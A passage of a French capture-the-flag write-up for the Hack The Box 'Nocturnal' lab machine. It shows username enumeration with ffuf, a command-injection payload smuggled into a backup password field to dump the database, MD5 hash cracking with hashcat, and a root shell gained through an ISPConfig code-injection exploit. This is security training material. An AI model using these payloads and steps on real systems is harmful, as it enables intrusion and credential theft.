<span class="nv">PHPSESSID</span><span class="o">=</span>u9iupob4f8khh30retevlt8gc6 </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span></code></pre></td></tr></table> </div> </div><p>J&rsquo;utilise ensuite l&rsquo;outil <strong>ffuf</strong> avec une liste de usernames de seclists. Je précise le parametre <strong>-fs 2985</strong> qui affiche donc les utilisateurs uniquement si la reponse renvoyé a une taille différente de 2985. Pour faire &ldquo;egale&rdquo;, on aurait écrit &ldquo;-ms&rdquo; :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal <span class="o">(</span>main*<span class="o">)</span> » ffuf -request dl.req -request-proto http -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -fs <span class="m">2985</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> /<span class="s1">&#39;___\ /&#39;</span>___<span class="se">\ </span> /<span class="err">&#39;</span>___<span class="se">\ </span> </span></span><span class="line"><span class="cl"> /<span class="se">\ \_</span>_/ /<span class="se">\ \_</span>_/ __ __ /<span class="se">\ \_</span>_/ </span></span><span class="line"><span class="cl"> <span class="se">\ \ </span>,__<span class="se">\\</span> <span class="se">\ </span>,__<span class="se">\/\ \/\ \ \ \ </span>,__<span class="se">\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\ \ \_</span>/ <span class="se">\ \ \_</span>/<span class="se">\ \ \_\ \ \ \ \_</span>/ </span></span><span class="line"><span class="cl"> <span class="se">\ \_\ </span> <span class="se">\ \_\ </span> <span class="se">\ \_</span>___/ <span class="se">\ \_\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\/</span>_/ <span class="se">\/</span>_/ <span class="se">\/</span>___/ <span class="se">\/</span>_/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> v2.1.0-dev </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> :: Method : GET </span></span><span class="line"><span class="cl"> :: URL : http://nocturnal.htb/view.php?username<span class="o">=</span>FUZZ<span class="p">&amp;</span><span class="nv">file</span><span class="o">=</span>a.pdf </span></span><span class="line"><span class="cl"> :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt </span></span><span class="line"><span class="cl"> :: Header : Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl"> :: Header : Cookie: <span class="nv">PHPSESSID</span><span class="o">=</span>u9iupob4f8khh30retevlt8gc6 </span></span><span class="line"><span class="cl"> :: Header : Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl"> :: Header : Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl"> :: Header : Host: nocturnal.htb </span></span><span class="line"><span class="cl"> :: Header : User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:128.0<span class="o">)</span> Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl"> :: Header : Accept-Language: fr,fr-FR<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.3 </span></span><span class="line"><span class="cl"> :: Header : Connection: keep-alive </span></span><span class="line"><span class="cl"> :: Header : Referer: http://nocturnal.htb/dashboard.php </span></span><span class="line"><span class="cl"> :: Header : Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl"> :: Follow redirects : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Calibration : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Timeout : <span class="m">10</span> </span></span><span class="line"><span class="cl"> :: Threads : <span class="m">40</span> </span></span><span class="line"><span class="cl"> :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 </span></span><span class="line"><span class="cl"> :: Filter : Response size: <span class="m">2985</span> </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">admin <span class="o">[</span>Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 26ms<span class="o">]</span> </span></span><span class="line"><span class="cl">hello <span class="o">[</span>Status: 200, Size: 3118, Words: 1175, Lines: 129, Duration: 21ms<span class="o">]</span> </span></span><span class="line"><span class="cl">amanda <span class="o">[</span>Status: 200, Size: 3113, Words: 1175, Lines: 129, Duration: 20ms<span class="o">]</span> </span></span><span class="line"><span class="cl">tobias <span class="o">[</span>Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 19ms<span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><p>On trouve plusieurs usernames, dont amanda qui est correct et contient un fichier privacy avec un mot de passe a l&rsquo;interieur:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /view.php?username<span class="o">=</span>amanda<span class="p">&amp;</span><span class="nv">file</span><span class="o">=</span>privacy.odt HTTP/1.1 </span></span><span class="line"><span class="cl">Host: nocturnal.htb </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dear Amanda, </span></span><span class="line"><span class="cl">Nocturnal has <span class="nb">set</span> the following temporary password <span class="k">for</span> you: arHkG7HAI68X8s1J. This password has been <span class="nb">set</span> <span class="k">for</span> all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure. </span></span><span class="line"><span class="cl">The file has been created and provided by Nocturnal<span class="s1">&#39;s IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us. </span></span></span><span class="line"><span class="cl"><span class="s1">Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter. </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">Yours sincerely, </span></span></span><span class="line"><span class="cl"><span class="s1">Nocturnal&#39;</span>s IT team </span></span></code></pre></td></tr></table> </div> </div><h3 id="amanda---admin-dashboard">Amanda - Admin Dashboard </h3><p>On peut creer une backup des fichiers. On peut injecter des commandes dans le champs permettant de préciser le mot de passe du zip. L&rsquo;idée est de bypasser le filtre qui interdit les espaces, &lsquo;;&rsquo; etc.. En utilisant &ldquo;%09&rdquo; on peut bypasser le filtre et mettre des espaces ! Attention a toujours tester ce genre de choses dans Burp !! En faisant directement dans la part</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /admin.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: nocturnal.htb </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:128.0<span class="o">)</span> Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: fr,fr-FR<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.3 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: <span class="m">95</span> </span></span><span class="line"><span class="cl">Origin: http://nocturnal.htb </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://nocturnal.htb/admin.php </span></span><span class="line"><span class="cl">Cookie: <span class="nv">PHPSESSID</span><span class="o">=</span>h28ba7dgkhrqt67c0ktleof1d1 </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">password</span><span class="o">=</span>%0Abash%09-c%09<span class="s2">&#34;base64%09/var/www/nocturnal_database/nocturnal_database.db&#34;</span>%0A<span class="p">&amp;</span><span class="nv">backup</span><span class="o">=</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="nocturnaldb">nocturnal.db </h3><p>On peut maintenant dumper la db et casser le hachage du mot de passe de :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal <span class="o">(</span>main*<span class="o">)</span> » sqlite3 ~/Téléchargements/download.sqlite </span></span><span class="line"><span class="cl">SQLite version 3.46.1 2024-08-13 09:16:08 </span></span><span class="line"><span class="cl">Enter <span class="s2">&#34;.help&#34;</span> <span class="k">for</span> usage hints. </span></span><span class="line"><span class="cl">sqlite&gt; .tables </span></span><span class="line"><span class="cl">uploads users </span></span><span class="line"><span class="cl">sqlite&gt; <span class="k">select</span> * from users<span class="p">;</span> </span></span><span class="line"><span class="cl">1<span class="p">|</span>admin<span class="p">|</span>d725aeba143f575736b07e045d8ceebb </span></span><span class="line"><span class="cl">2<span class="p">|</span>amanda<span class="p">|</span>df8b20aa0c935023f99ea58358fb63c4 </span></span><span class="line"><span class="cl">4<span class="p">|</span>tobias<span class="p">|</span>55c82b1ccd55ab219b3b109b07d5061d </span></span><span class="line"><span class="cl">6<span class="p">|</span>test<span class="p">|</span>098f6bcd4621d373cade4e832627b4f6 </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal <span class="o">(</span>main*<span class="o">)</span> » hashcat -m <span class="m">0</span> hash.txt /usr/share/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">hashcat <span class="o">(</span>v6.2.6<span class="o">)</span> starting </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dictionary cache built: </span></span><span class="line"><span class="cl">* Filename..: /usr/share/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">* Passwords.: <span class="m">14344392</span> </span></span><span class="line"><span class="cl">* Bytes.....: <span class="m">139921507</span> </span></span><span class="line"><span class="cl">* Keyspace..: <span class="m">14344385</span> </span></span><span class="line"><span class="cl">* Runtime...: <span class="m">2</span> secs </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">55c82b1ccd55ab219b3b109b07d5061d:slowmotionapocalypse </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Session..........: hashcat </span></span><span class="line"><span class="cl">Status...........: Cracked </span></span><span class="line"><span class="cl">Hash.Mode........: <span class="m">0</span> <span class="o">(</span>MD5<span class="o">)</span> </span></span><span class="line"><span class="cl">Hash.Target......: 55c82b1ccd55ab219b3b109b07d5061d </span></span><span class="line"><span class="cl">Time.Started.....: Wed Apr <span class="m">16</span> 14:57:40 <span class="m">2025</span> <span class="o">(</span><span class="m">1</span> sec<span class="o">)</span> </span></span><span class="line"><span class="cl">Time.Estimated...: Wed Apr <span class="m">16</span> 14:57:41 <span class="m">2025</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Kernel.Feature...: Pure Kernel </span></span><span class="line"><span class="cl">Guess.Base.......: File <span class="o">(</span>/usr/share/wordlists/rockyou.txt<span class="o">)</span> </span></span><span class="line"><span class="cl">Guess.Queue......: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Speed.#1.........: 12149.4 kH/s <span class="o">(</span>4.50ms<span class="o">)</span> @ Accel:2048 Loops:1 Thr:32 Vec:1 </span></span><span class="line"><span class="cl">Recovered........: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Digests <span class="o">(</span>total<span class="o">)</span>, 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Digests <span class="o">(</span>new<span class="o">)</span> </span></span><span class="line"><span class="cl">Progress.........: 4128768/14344385 <span class="o">(</span>28.78%<span class="o">)</span> </span></span><span class="line"><span class="cl">Rejected.........: 0/4128768 <span class="o">(</span>0.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Point....: 3538944/14344385 <span class="o">(</span>24.67%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 </span></span><span class="line"><span class="cl">Candidate.Engine.: Device Generator </span></span><span class="line"><span class="cl">Candidates.#1....: stefy06 -&gt; ruddsound1 </span></span><span class="line"><span class="cl">Hardware.Mon.#1..: Temp: 35c Fan: 46% Util: 29% Core:1544MHz Mem:3802MHz Bus:16 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Started: Wed Apr <span class="m">16</span> 14:57:29 <span class="m">2025</span> </span></span><span class="line"><span class="cl">Stopped: Wed Apr <span class="m">16</span> 14:57:42 <span class="m">2025</span> </span></span><span class="line"><span class="cl">~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal <span class="o">(</span>main*<span class="o">)</span> » hashcat -m <span class="m">0</span> hash.txt /usr/share/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl">55c82b1ccd55ab219b3b109b07d5061d:slowmotionapocalypse </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal <span class="o">(</span>main*<span class="o">)</span> » ssh -L 8888:localhost:8080 tobias@nocturnal.htb </span></span><span class="line"><span class="cl">tobias@nocturnal.htb<span class="err">&#39;</span>s password: </span></span><span class="line"><span class="cl">Welcome to Ubuntu 20.04.6 LTS <span class="o">(</span>GNU/Linux 5.4.0-212-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Last login: Wed Apr <span class="m">16</span> 12:59:25 <span class="m">2025</span> from 10.10.14.10 </span></span><span class="line"><span class="cl">tobias@nocturnal:~$ ls </span></span><span class="line"><span class="cl">user.txt </span></span><span class="line"><span class="cl">tobias@nocturnal:~$ cat user.txt </span></span><span class="line"><span class="cl">7922.....0dd3 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="netstat--ano---port-forwarding-8080">netstat -ano - port forwarding 8080 </h3><p>On découvre un port 8080 ouvert uniquement de l&rsquo;interieur. On decide de faire du port forwarding pour voir la page web sur notre navigateur:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ssh -L 8888:localhost:8080 tobias@nocturnal.htb </span></span></code></pre></td></tr></table> </div> </div><h3 id="ispconfig-3210p1">ISPConfig 3.2.10p1 </h3><p>On découvre une page web &ldquo;ISPConfig&rdquo; On peut se connecter au compte &ldquo;admin&rdquo; avec le mot de passe de tobias &ldquo;slowmotionapocalypse&rdquo;. On trouve un dashboard et on identifie la version &ldquo;3.2.10p1&rdquo;.</p> <h3 id="exploit--authenticated-rce-ispconfig">Exploit : Authenticated RCE ISPConfig </h3><p>Avec searchsploit, on ne trouve que d&rsquo;anciennes vulnérabilités. Cependant, sur google on trouve un lien vers un POC qui semble plus récent : <a class="link" href="https://packetstorm.news/files/id/176126" target="_blank" rel="noopener" >https://packetstorm.news/files/id/176126</a></p> <p>&ldquo;ISPConfig versions 3.2.11 and below suffer from a PHP code injection vulnerability in language_edit.php.&rdquo;</p> <p>On observe ici le parametre &ldquo;lang_file&rdquo; qui est injectable.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">curl_setopt<span class="o">(</span><span class="nv">$ch</span>, CURLOPT_URL, <span class="s2">&#34;{</span><span class="nv">$url</span><span class="s2">}admin/language_edit.php&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">curl_setopt<span class="o">(</span><span class="nv">$ch</span>, CURLOPT_POSTFIELDS, <span class="s2">&#34;lang=en&amp;module=help&amp;lang_file={</span><span class="nv">$lang_file</span><span class="s2">}&#34;</span><span class="o">)</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><p>En utilisant le POC, et les credentials admin, on obtient directement un shell en tant que root :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">» php exploit.php http://localhost:8888/ admin slowmotionapocalypse </span></span><span class="line"><span class="cl">------------------------------------------------------------------------ </span></span><span class="line"><span class="cl">ISPConfig &lt;<span class="o">=</span> 3.2.11 <span class="o">(</span>language_edit.php<span class="o">)</span> PHP Code Injection Vulnerability </span></span><span class="line"><span class="cl">------------------------------------------------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Software Link: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">https://www.ispconfig.org </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Affected Versions: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Version 3.2.11 and prior versions. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Vulnerabilities Description: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User input passed through the <span class="s2">&#34;records&#34;</span> POST parameter to </span></span><span class="line"><span class="cl">/admin/language_edit.php is not properly sanitized before being used </span></span><span class="line"><span class="cl">to dynamically generate PHP code that will be executed by the </span></span><span class="line"><span class="cl">application. This can be exploited by malicious administrator users to </span></span><span class="line"><span class="cl">inject and execute arbitrary PHP code on the web server. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Proof of Concept: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">https://karmainsecurity.com/pocs/CVE-2023-46818.php </span></span><span class="line"><span class="cl"><span class="o">(</span>Packet Storm Editor Note: See bottom of this file <span class="k">for</span> PoC<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Solution: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Upgrade to version 3.2.11p1 or later. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Disclosure Timeline: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>25/10/2023<span class="o">]</span> - Vendor notified </span></span><span class="line"><span class="cl"><span class="o">[</span>26/10/2023<span class="o">]</span> - Version 3.2.11p1 released </span></span><span class="line"><span class="cl"><span class="o">[</span>27/10/2023<span class="o">]</span> - CVE identifier assigned </span></span><span class="line"><span class="cl"><span class="o">[</span>07/12/2023<span class="o">]</span> - Publication of this advisory </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> CVE Reference: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The Common Vulnerabilities and Exposures project <span class="o">(</span>cve.mitre.org<span class="o">)</span> </span></span><span class="line"><span class="cl">has assigned the name CVE-2023-46818 to this vulnerability. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Credits: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Vulnerability discovered by Egidio Romano. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Original Advisory: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">https://karmainsecurity.com/KIS-2023-13 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Other References: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--- CVE-2023-46818.php PoC --- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Logging in with username <span class="s1">&#39;admin&#39;</span> and password <span class="s1">&#39;slowmotionapocalypse&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Injecting shell </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Launching shell </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ispconfig-shell# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ispconfig-shell# cat /root/root.txt </span></span><span class="line"><span class="cl">9b18.....21bf </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li> <p>J&rsquo;ai découvert qu&rsquo;on pouvait vérifier facilement si un utilisateur existait en faisant une requete specifique. J&rsquo;ai meme pensé à faire un Fuzz, eventuellement avec Burp Sniper ou un autre outil. Je n&rsquo;ai pas essayé et je suis aller voir le write up&hellip; C&rsquo;était bien ça la solution&hellip;</p> </li> <li> <p>Lorsqu&rsquo;on trouve une entrée utilisateur injectable, toujours faire des tests dans BURP !! Ou avec curl (à la rigueur). Mais jamais directement sur la page web. Ici, il fallait utilisé %0a pour remplacer un caractère espace. Le problème c&rsquo;est que ca n&rsquo;a pas fonctionné car c&rsquo;était remplacé par &ldquo;%XX%XX&rdquo; avec d&rsquo;autre valeur a cause de l&rsquo;URL encoding. Attention donc a bien testé les parametres injectables directement dans BURP pour eviter qu&rsquo;il y ait un URL encoding qui s&rsquo;applique sans qu&rsquo;on le sache.</p> </li> </ul>https://leopoldabgn.github.io/writeups/p/armageddon-htb/Mon, 07 Apr 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/armageddon-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Armageddon cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; 